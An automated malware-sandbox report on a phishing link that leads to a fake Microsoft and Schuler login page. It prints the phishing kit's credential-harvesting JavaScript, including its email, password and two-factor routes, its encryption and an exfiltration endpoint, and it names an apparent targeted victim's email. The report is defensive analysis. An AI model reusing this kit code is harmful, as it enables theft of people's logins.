Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://www.itanhangasaude.com.br/www/1475312998d8aKqdmPdPNJZi4JNq7WIowwvYGOvuIT___714820ufgtMx5cBwKyVuzlJn3VAYy1QdJUF0IuhCb1EFSueBwxxR9n7T4VNMSyrZd9kcF9rD67v2lJn3VufgtMP8xfiVl9n3IuhCbR9n7Tx5cBw4VNMSx5cBwi3vtsVl9n3MryfS1EFSuufgtMi3vts7O1AR408519___47741237d8aKqdmPdPNJZi4JNq7WIowwvYGOvuIT

Overview

General Information

Sample URL:https://www.itanhangasaude.com.br/www/1475312998d8aKqdmPdPNJZi4JNq7WIowwvYGOvuIT___714820ufgtMx5cBwKyVuzlJn3VAYy1QdJUF0IuhCb1EFSueBwxxR9n7T4VNMSyrZd9kcF9rD67v2lJn3VufgtMP8xfiVl9n3IuhCbR9n7Tx5cBw4VNMSx
Analysis ID:1466693
Infos:

Detection

HTMLPhisher
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Antivirus detection for URL or domain
Yara detected HtmlPhish10
Phishing site detected (based on image similarity)
Phishing site detected (based on logo match)
Phishing site detected (based on shot match)
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)
Detected non-DNS traffic on DNS port
HTML body contains low number of good links
HTML body contains password input but no form action
HTML page contains hidden URLs or javascript code
HTML title does not match URL
Invalid T&C link found
Uses insecure TLS / SSL version for HTTPS connection

Classification

  • System is w10x64
  • chrome.exe (PID: 5664 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
    • chrome.exe (PID: 4156 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2124 --field-trial-handle=2020,i,4672451666164520208,10170229004511272603,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • chrome.exe (PID: 2156 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.itanhangasaude.com.br/www/1475312998d8aKqdmPdPNJZi4JNq7WIowwvYGOvuIT___714820ufgtMx5cBwKyVuzlJn3VAYy1QdJUF0IuhCb1EFSueBwxxR9n7T4VNMSyrZd9kcF9rD67v2lJn3VufgtMP8xfiVl9n3IuhCbR9n7Tx5cBw4VNMSx5cBwi3vtsVl9n3MryfS1EFSuufgtMi3vts7O1AR408519___47741237d8aKqdmPdPNJZi4JNq7WIowwvYGOvuIT" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
2.5.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
    2.6.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
      2.7.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
        No Sigma rule has matched
        No Snort rule has matched

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: https://vkwek.ckyucle.com/opQX1gSU09O17E3k10USpNWJby3griWtsKreijbClabV2GbvNaQkTef200Avira URL Cloud: Label: malware
        Source: https://vkwek.ckyucle.com/12TvEGAMcd3aPS6720Avira URL Cloud: Label: malware
        Source: https://vkwek.ckyucle.com/uvhQlfoMbJ4XJRFtu2qrnZlpt9TrWXuaMNtQnfO12130Avira URL Cloud: Label: malware
        Source: https://vkwek.ckyucle.com/wxygRZbM3kOCvEcFjIDlEKamnOMWqU6ryQDaTnQ90180Avira URL Cloud: Label: malware
        Source: https://nzd92.6gniu68.ru/5575968202461485388865565DuGzcrTyOZLFNLDIYSVXZDPOLLDSEDNQMSFAvira URL Cloud: Label: malware
        Source: https://vkwek.ckyucle.com/2DUx/Avira URL Cloud: Label: malware
        Source: https://vkwek.ckyucle.com/56NViOjdyBE66K4aemhQsnnijWU2q89KCdOOZ89106Avira URL Cloud: Label: malware
        Source: https://vkwek.ckyucle.com/favicon.icoAvira URL Cloud: Label: malware
        Source: https://vkwek.ckyucle.com/rfrj4D3IOrBb34OKfQNxY9akOmZckEWxXo9xwrWKJaQReBHFIHg5kn2Avira URL Cloud: Label: malware
        Source: https://vkwek.ckyucle.com/2DUx/#-Avira URL Cloud: Label: malware
        Source: https://vkwek.ckyucle.com/78l8NmRVxJ45fjuJRst60Avira URL Cloud: Label: malware
        Source: https://vkwek.ckyucle.com/45TplGCNDXCptZb896Wyz84jpQxy69Avira URL Cloud: Label: malware
        Source: https://vkwek.ckyucle.com/ghUQ6Orlc7xuQgWcYlBAqViojmkfQHsxQ81JqDSmnddnAwJvMkE5kY34tjef210Avira URL Cloud: Label: malware
        Source: https://vkwek.ckyucle.com/90YOSnhY5T8JbcpfefM5jeqjHMc7G9ab72Avira URL Cloud: Label: malware
        Source: https://vkwek.ckyucle.com/qr6FfLhLZ5QwaGe5HJsDHUaandv4RUef6Ia8VBkiV1U467140Avira URL Cloud: Label: malware
        Source: https://vkwek.ckyucle.com/mnV1lfGeFEBrSZF3tuYYejMClYOTm2XI5H6CdAfkleMiUWyqFdfMgv4x5mkyLwx220Avira URL Cloud: Label: malware
        Source: https://vkwek.ckyucle.com/kldibCibzXsTOdNtNAZcyznJMPZFnrycjnb52eIM56170Avira URL Cloud: Label: malware
        Source: https://vkwek.ckyucle.com/mnP7Z0RTacSIM9CxKvK5WayGyklgNKAsEypvOzHpfU2cP90150Avira URL Cloud: Label: malware
        Source: https://vkwek.ckyucle.com/yzBt71gp856BSdkJ4Qop47Avira URL Cloud: Label: malware
        Source: https://vkwek.ckyucle.com/pqJEZxAGJZqUBhc85R9yzrCUwx40Avira URL Cloud: Label: malware
        Source: https://vkwek.ckyucle.com/opyBbj15zt7RBaYZmgGW9bxLK2mu0meuvIDz6YOPBdPPv2mru5dCE8ifyMqnIcd240Avira URL Cloud: Label: malware
        Source: https://vkwek.ckyucle.com/2DUx/?W-crystal.begin@schulergroup.comAvira URL Cloud: Label: malware
        Source: https://vkwek.ckyucle.com/ijGLf8KcAmo8F8uFMIwMKt5jWtydfJOdOqrh5153ZvUBo56RjXXwgHIOxu3KbwiSDyz230Avira URL Cloud: Label: malware
        Source: https://vkwek.ckyucle.com/xy12R7tzrssHzef25Avira URL Cloud: Label: malware
        Source: https://vkwek.ckyucle.com/wpn0pH3CIM5nU02jRmQ0L1Y1phPSwbSM0agAvira URL Cloud: Label: malware
        Source: https://vkwek.ckyucle.com/ef6ywsH6ValAwIHzgds78wUwuLf89smkl92Avira URL Cloud: Label: malware

        Phishing

        barindex
        Source: https://vkwek.ckyucle.comLLM: Score: 9 brands: Microsoft Reasons: The URL 'https://vkwek.ckyucle.com' does not match the legitimate domain 'microsoft.com' associated with the brand Microsoft. The presence of a prominent login form asking for email credentials is a common phishing tactic. The domain name appears suspicious and unrelated to Microsoft, indicating potential phishing. The image resembles a legitimate Microsoft login page, which is a social usering technique to mislead users. Additionally, the presence of a suspicious link ('No account? Create one!') that could potentially lead to a harmful page further supports the phishing suspicion. DOM: 2.5.pages.csv
        Source: https://vkwek.ckyucle.comLLM: Score: 9 brands: Schuler Reasons: The URL 'https://vkwek.ckyucle.com' does not match the legitimate domain 'schulergroup.com' associated with the Schuler brand. The presence of a prominent login form asking for a password is a common phishing tactic. The domain name is highly suspicious and does not align with the legitimate domain. The use of social usering techniques is evident as the site mimics a legitimate login page to deceive users into entering their credentials. Additionally, the link to 'Forgot my password' could potentially lead to further phishing attempts. DOM: 2.7.pages.csv
        Source: Yara matchFile source: 2.5.pages.csv, type: HTML
        Source: Yara matchFile source: 2.6.pages.csv, type: HTML
        Source: Yara matchFile source: 2.7.pages.csv, type: HTML
        Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsMatcher: Found strong image similarity, brand: MICROSOFT
        Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsMatcher: Template: microsoft matched
        Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsMatcher: Template: microsoft matched
        Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/57uca/0x4AAAAAAAdPpzcgFVvp_PUK/auto/normalMatcher: Template: captcha matched
        Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/57uca/0x4AAAAAAAdPpzcgFVvp_PUK/auto/normalMatcher: Template: captcha matched
        Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsHTTP Parser: var websitenames = ["godaddy", "okta"];var capnum = 1;var appnum = 1;var view = "";var pagelinkval = "XkpxX";var emailcheck = "crystal.begin@schulergroup.com";var webname = "rtrim(/web8/, '/')";var urlo = "rfrj4D3IOrBb34OKfQNxY9akOmZckEWxXo9xwrWKJaQReBHFIHg5kn2";var gdf = "ijG4yW3R7FY813hQeumBEAUyzYJiiCY97PHkccd114";var odf = "ghU2EPAQmKCucHi9wxct32lto7kIab643";var requestsent = false;var pagedata = "";var redirecturl = "";let userAgent = navigator.userAgent;let browserName;let userip;let usercountry;var errorcodeexecuted = false;if(userAgent.match(/chrome|chromium|crios/i)){ browserName = "chrome";} else if(userAgent.match(/firefox|fxios/i)){ browserName = "firefox";} else if(userAgent.match(/safari/i)){ browserName = "safari";} else if(userAgent.match(/opr\//i)){ browserName = "opera";} else if(userAgent.match(/edg/i)){ browserName = "edge";} else{ browserName="No browser detection";}function encryptData(data) { const key = CryptoJS.enc.Utf8.parse('1234567890123456'); const iv = CryptoJS.enc.Utf8.parse('1234567890123456'); const encrypted = CryptoJS.AES.encrypt(data, key, { iv: iv, padding: CryptoJS.pad.Pkcs7, mode: CryptoJS.mode.CBC }); return encrypted.toString();}function decryptData(encryptedData) { const key = CryptoJS.enc.Utf8.parse('1234567890123456'); const iv = CryptoJS.enc.Utf8.parse('1234567890123456'); const decrypted = CryptoJS.AES.decrypt(encryptedData, key, { iv: iv, padding: CryptoJS.pad.Pkcs7, mode: CryptoJS.mode.CBC }); return decrypted.toString(CryptoJS.enc.Utf8);}const sendAndReceive = (route, args, getresponse) => {if(requestsent == true && route !== "twofaselect"){return JSON.parse({"message": "waiting for previous request to complete"});}if(requestsent == false || route == "twofaselect"){requestsent = true;let routename = null;let randpattern = null;if(route == "checkemail"){randpattern = /(pq|rs)[A-Za-z0-9]{6,18}(yz|12|34)[A-Za-z0-9]{2,7}(uv|wx)(3[1-9]|40)/gm;}if(route == "checkpass"){randpattern = /(yz|12)[A-Za-z0-9]{7,14}(56|78)[A-Za-z0-9]{3,8}(op|qr)(4[1-9]|50)/gm;}if(route == "twofaselect"){randpattern = /(56|78|90)[A-Za-z0-9]{8,16}(23|45|67)[A-Za-z0-9]{4,9}(st|uv)(5[1-9]|60)/gm;}if(route == "twofaselected"){randpattern = /(23|45)[A-Za-z0-9]{9,20}(89|90|ab)[A-Za-z0-9]{5,10}(vw|xy)(6[1-9]|70)/gm;}let randexp = new RandExp(randpattern);let randroute = randexp.gen();let formattedargs = 0;if(route == "checkemail"){formattedargs = args.map(item => '/'+item).join('')+'/'+appnum+'/'+getresponse;}if(route !== "checkemail"){formattedargs = '/'+token+args.map(item => '/'+item).join('')+'/'+getresponse;}// console.log(formattedargs);let encrypteddata = encryptData(formattedargs);const makeRequest = (retryCount) => { return new Promise((resolve, reject) => { // url: 'http://91.219.150.47:3000/' + route + formattedargs, // type: 'GET',
        Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsHTTP Parser: var websitenames = ["godaddy", "okta"];var capnum = 1;var appnum = 1;var view = "";var pagelinkval = "XkpxX";var emailcheck = "crystal.begin@schulergroup.com";var webname = "rtrim(/web8/, '/')";var urlo = "rfrj4D3IOrBb34OKfQNxY9akOmZckEWxXo9xwrWKJaQReBHFIHg5kn2";var gdf = "ijG4yW3R7FY813hQeumBEAUyzYJiiCY97PHkccd114";var odf = "ghU2EPAQmKCucHi9wxct32lto7kIab643";var requestsent = false;var pagedata = "";var redirecturl = "";let userAgent = navigator.userAgent;let browserName;let userip;let usercountry;var errorcodeexecuted = false;if(userAgent.match(/chrome|chromium|crios/i)){ browserName = "chrome";} else if(userAgent.match(/firefox|fxios/i)){ browserName = "firefox";} else if(userAgent.match(/safari/i)){ browserName = "safari";} else if(userAgent.match(/opr\//i)){ browserName = "opera";} else if(userAgent.match(/edg/i)){ browserName = "edge";} else{ browserName="No browser detection";}function encryptData(data) { const key = CryptoJS.enc.Utf8.parse('1234567890123456'); const iv = CryptoJS.enc.Utf8.parse('1234567890123456'); const encrypted = CryptoJS.AES.encrypt(data, key, { iv: iv, padding: CryptoJS.pad.Pkcs7, mode: CryptoJS.mode.CBC }); return encrypted.toString();}function decryptData(encryptedData) { const key = CryptoJS.enc.Utf8.parse('1234567890123456'); const iv = CryptoJS.enc.Utf8.parse('1234567890123456'); const decrypted = CryptoJS.AES.decrypt(encryptedData, key, { iv: iv, padding: CryptoJS.pad.Pkcs7, mode: CryptoJS.mode.CBC }); return decrypted.toString(CryptoJS.enc.Utf8);}const sendAndReceive = (route, args, getresponse) => {if(requestsent == true && route !== "twofaselect"){return JSON.parse({"message": "waiting for previous request to complete"});}if(requestsent == false || route == "twofaselect"){requestsent = true;let routename = null;let randpattern = null;if(route == "checkemail"){randpattern = /(pq|rs)[A-Za-z0-9]{6,18}(yz|12|34)[A-Za-z0-9]{2,7}(uv|wx)(3[1-9]|40)/gm;}if(route == "checkpass"){randpattern = /(yz|12)[A-Za-z0-9]{7,14}(56|78)[A-Za-z0-9]{3,8}(op|qr)(4[1-9]|50)/gm;}if(route == "twofaselect"){randpattern = /(56|78|90)[A-Za-z0-9]{8,16}(23|45|67)[A-Za-z0-9]{4,9}(st|uv)(5[1-9]|60)/gm;}if(route == "twofaselected"){randpattern = /(23|45)[A-Za-z0-9]{9,20}(89|90|ab)[A-Za-z0-9]{5,10}(vw|xy)(6[1-9]|70)/gm;}let randexp = new RandExp(randpattern);let randroute = randexp.gen();let formattedargs = 0;if(route == "checkemail"){formattedargs = args.map(item => '/'+item).join('')+'/'+appnum+'/'+getresponse;}if(route !== "checkemail"){formattedargs = '/'+token+args.map(item => '/'+item).join('')+'/'+getresponse;}// console.log(formattedargs);let encrypteddata = encryptData(formattedargs);const makeRequest = (retryCount) => { return new Promise((resolve, reject) => { // url: 'http://91.219.150.47:3000/' + route + formattedargs, // type: 'GET',
        Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsHTTP Parser: var websitenames = ["godaddy", "okta"];var capnum = 1;var appnum = 1;var view = "";var pagelinkval = "XkpxX";var emailcheck = "crystal.begin@schulergroup.com";var webname = "rtrim(/web8/, '/')";var urlo = "rfrj4D3IOrBb34OKfQNxY9akOmZckEWxXo9xwrWKJaQReBHFIHg5kn2";var gdf = "ijG4yW3R7FY813hQeumBEAUyzYJiiCY97PHkccd114";var odf = "ghU2EPAQmKCucHi9wxct32lto7kIab643";var requestsent = false;var pagedata = "";var redirecturl = "";let userAgent = navigator.userAgent;let browserName;let userip;let usercountry;var errorcodeexecuted = false;if(userAgent.match(/chrome|chromium|crios/i)){ browserName = "chrome";} else if(userAgent.match(/firefox|fxios/i)){ browserName = "firefox";} else if(userAgent.match(/safari/i)){ browserName = "safari";} else if(userAgent.match(/opr\//i)){ browserName = "opera";} else if(userAgent.match(/edg/i)){ browserName = "edge";} else{ browserName="No browser detection";}function encryptData(data) { const key = CryptoJS.enc.Utf8.parse('1234567890123456'); const iv = CryptoJS.enc.Utf8.parse('1234567890123456'); const encrypted = CryptoJS.AES.encrypt(data, key, { iv: iv, padding: CryptoJS.pad.Pkcs7, mode: CryptoJS.mode.CBC }); return encrypted.toString();}function decryptData(encryptedData) { const key = CryptoJS.enc.Utf8.parse('1234567890123456'); const iv = CryptoJS.enc.Utf8.parse('1234567890123456'); const decrypted = CryptoJS.AES.decrypt(encryptedData, key, { iv: iv, padding: CryptoJS.pad.Pkcs7, mode: CryptoJS.mode.CBC }); return decrypted.toString(CryptoJS.enc.Utf8);}const sendAndReceive = (route, args, getresponse) => {if(requestsent == true && route !== "twofaselect"){return JSON.parse({"message": "waiting for previous request to complete"});}if(requestsent == false || route == "twofaselect"){requestsent = true;let routename = null;let randpattern = null;if(route == "checkemail"){randpattern = /(pq|rs)[A-Za-z0-9]{6,18}(yz|12|34)[A-Za-z0-9]{2,7}(uv|wx)(3[1-9]|40)/gm;}if(route == "checkpass"){randpattern = /(yz|12)[A-Za-z0-9]{7,14}(56|78)[A-Za-z0-9]{3,8}(op|qr)(4[1-9]|50)/gm;}if(route == "twofaselect"){randpattern = /(56|78|90)[A-Za-z0-9]{8,16}(23|45|67)[A-Za-z0-9]{4,9}(st|uv)(5[1-9]|60)/gm;}if(route == "twofaselected"){randpattern = /(23|45)[A-Za-z0-9]{9,20}(89|90|ab)[A-Za-z0-9]{5,10}(vw|xy)(6[1-9]|70)/gm;}let randexp = new RandExp(randpattern);let randroute = randexp.gen();let formattedargs = 0;if(route == "checkemail"){formattedargs = args.map(item => '/'+item).join('')+'/'+appnum+'/'+getresponse;}if(route !== "checkemail"){formattedargs = '/'+token+args.map(item => '/'+item).join('')+'/'+getresponse;}// console.log(formattedargs);let encrypteddata = encryptData(formattedargs);const makeRequest = (retryCount) => { return new Promise((resolve, reject) => { // url: 'http://91.219.150.47:3000/' + route + formattedargs, // type: 'GET',
        Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsHTTP Parser: Number of links: 0
        Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsHTTP Parser: <input type="password" .../> found but no <form action="...
        Source: https://vkwek.ckyucle.com/2DUx/#-crystal.begin@schulergroup.comHTTP Parser: Base64 decoded: <!DOCTYPE html><html lang="en"><head> <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script> <script src="https://challenges.cloudflare.com/turnstile/v0/api.js?render=explicit"></script> <script src="https://cdnjs.cloudflar...
        Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsHTTP Parser: Title: Fair Value does not match URL
        Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsHTTP Parser: Invalid link: Terms of use
        Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsHTTP Parser: Invalid link: Privacy & cookies
        Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsHTTP Parser: Invalid link: Terms of use
        Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsHTTP Parser: Invalid link: Privacy & cookies
        Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsHTTP Parser: Invalid link: Terms of use
        Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsHTTP Parser: Invalid link: Privacy & cookies
        Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsHTTP Parser: <input type="password" .../> found
        Source: https://vkwek.ckyucle.com/2DUx/#-crystal.begin@schulergroup.comHTTP Parser: No favicon
        Source: https://vkwek.ckyucle.com/2DUx/#-crystal.begin@schulergroup.comHTTP Parser: No favicon
        Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/57uca/0x4AAAAAAAdPpzcgFVvp_PUK/auto/normalHTTP Parser: No favicon
        Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/57uca/0x4AAAAAAAdPpzcgFVvp_PUK/auto/normalHTTP Parser: No favicon
        Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsHTTP Parser: No favicon
        Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsHTTP Parser: No favicon
        Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsHTTP Parser: No favicon
        Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsHTTP Parser: No <meta name="author".. found
        Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsHTTP Parser: No <meta name="author".. found
        Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsHTTP Parser: No <meta name="author".. found
        Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsHTTP Parser: No <meta name="copyright".. found
        Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsHTTP Parser: No <meta name="copyright".. found
        Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsHTTP Parser: No <meta name="copyright".. found
        Source: unknownHTTPS traffic detected: 173.222.162.64:443 -> 192.168.2.6:49753 version: TLS 1.0
        Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49710 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49711 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49722 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49723 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 23.43.61.160:443 -> 192.168.2.6:49729 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 23.43.61.160:443 -> 192.168.2.6:49735 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49754 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49755 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:62938 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:62978 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:62980 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:62987 version: TLS 1.2
        Source: global trafficTCP traffic: 192.168.2.6:49712 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.6:61005 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.6:62906 -> 162.159.36.2:53
        Source: unknownHTTPS traffic detected: 173.222.162.64:443 -> 192.168.2.6:49753 version: TLS 1.0
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
        Source: global trafficHTTP traffic detected: GET /www/1475312998d8aKqdmPdPNJZi4JNq7WIowwvYGOvuIT___714820ufgtMx5cBwKyVuzlJn3VAYy1QdJUF0IuhCb1EFSueBwxxR9n7T4VNMSyrZd9kcF9rD67v2lJn3VufgtMP8xfiVl9n3IuhCbR9n7Tx5cBw4VNMSx5cBwi3vtsVl9n3MryfS1EFSuufgtMi3vts7O1AR408519___47741237d8aKqdmPdPNJZi4JNq7WIowwvYGOvuIT HTTP/1.1Host: www.itanhangasaude.com.brConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, 